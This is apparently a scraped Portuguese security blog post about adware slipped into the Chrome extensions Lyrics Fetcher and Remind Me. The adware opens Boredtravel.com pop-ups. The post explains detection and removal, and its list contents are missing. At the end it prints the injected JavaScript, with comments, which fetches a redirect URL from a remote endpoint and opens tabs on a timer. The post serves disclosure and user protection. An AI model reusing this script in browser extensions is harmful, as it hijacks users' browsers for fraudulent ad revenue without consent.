Um adware que abre pop-ups para o Boredtravel.com caiu em algumas extens\u00f5es do Chrome. Veja como detectar e remover esse v\u00edrus.<\/p>\n\n\n\n\n\n
Um script malicioso foi inserido na atualiza\u00e7\u00e3o mais recente de v\u00e1rias extens\u00f5es do Chrome. Este script abre o site Boredtravel.com sem o conhecimento dos usu\u00e1rios, em intervalos regulares de tempo. As extens\u00f5es infectadas por esse script s\u00e3o Lyrics Fetcher e Remind Me, do desenvolvedor webwebtech.<\/p>\n\n\n\n
Este adware n\u00e3o \u00e9 perigoso, pois apenas abre uma p\u00e1gina de publicidade. No entanto, \u00e9 perturbador deixar que essa pr\u00e1tica d\u00fabia ocorra.<\/p>\n\n\n\n
Para identificar o adware, basta analisar o comportamento do seu navegador:<\/p>\n\n\n\n
A remo\u00e7\u00e3o \u00e9 simples e r\u00e1pida:<\/p>\n\n\n\n
Casos foram identificados para extens\u00f5es Lyrics Fetcher<\/a> e Lembrar-me<\/a>, mas eles podem n\u00e3o ser os \u00fanicos. \u00c9 poss\u00edvel que o adware tamb\u00e9m esteja presente na extens\u00e3o Modo Beb\u00ea<\/a>, uma extens\u00e3o do mesmo desenvolvedor. <\/p>\n\n\n\n N\u00e3o est\u00e1 claro se o desenvolvedor desta extens\u00e3o adicionou deliberadamente o script mal-intencionado ou se foi feito por um hacker. Como precau\u00e7\u00e3o, recomendamos que voc\u00ea desative ou remova todas as extens\u00f5es deste desenvolvedor. <\/p>\n\n\n\n As extens\u00f5es foram relatadas ao Google, saberemos mais em breve. Se outras extens\u00f5es tiverem a mesma preocupa\u00e7\u00e3o, n\u00e3o hesite em nos informar.<\/p>\n\n\n\n Aqui est\u00e3o algumas extens\u00f5es alternativas:<\/p>\n\n\n\n O princ\u00edpio \u00e9 simples: o desenvolvedor ou um hacker adicionou um script nas extens\u00f5es em quest\u00e3o. Esse script, executado em segundo plano, instrui o navegador a abrir uma p\u00e1gina de publicidade em intervalos regulares. O objetivo para o desenvolvedor ou hacker \u00e9 que a p\u00e1gina de destino seja aberta v\u00e1rias vezes. Isso permite aumentar o n\u00famero de visualiza\u00e7\u00f5es do site Boredtravel.com e aumentar a receita relacionada.<\/p>\n\n\n\n Aqui est\u00e1 o c\u00f3digo que foi adicionado na extens\u00e3o. Adicionei coment\u00e1rios verdes para voc\u00ea entender melhor<\/p>\n\n\nSubstituir extens\u00f5es<\/h3>\n\n\n\n
O trabalho de Boredtravel.com<\/h2>\n\n\n\n
\n<script>\n\n\n\/\/ fonction qui ouvre un pop-up 6 minutes apr\u00e8s le d\u00e9marrage de Chrome\n setTimeout(function () { \n $.ajax({\n url: "https:\/\/demo7530752.mockable.io\/url",\n \/* cette URL g\u00e9n\u00e8re un lien du type\n https:\/\/ourshort.com\/?g\/BNHzHJJ *\/\n async: false,\n dataType: 'json',\n success: function (data) {\n\n \/\/ouverture du lien g\u00e9n\u00e9r\u00e9, qui redirige ensuite vers Boredtravel.com\n var newURL = data.msg;\n chrome.tabs.create({ url: newURL }); ;\n intervalWebsite() \/* appel de la fonction qui ouvre\n un pop-up toutes les 4 heures *\/\n }\n });\n }, 6 * 60 * 1000) \/\/ 6 x 60 x 1000 millisecondes = 6 min\n\n\n\/\/ fonction qui ouvre un pop-up toutes les 4 heures\n function intervalWebsite() {\n setInterval(function () {\n $.ajax({\n url: "https:\/\/demo7530752.mockable.io\/url",\n \/\/ comme dans la premi\u00e8re fonction\n async: false,\n dataType: 'json',\n success: function (data) {\n\n \/\/ comme dans la premi\u00e8re fonction\n var newURL = data.msg;\n chrome.tabs.create({ url: newURL }); ;\n\n }\n });\n }, 240 * 60 * 1000)\/\/ 240 x 60 x 1000 millisecondes = 240 min = 4h\n }\n\n\n<\/script>\n<\/pre><\/div>\n\n\n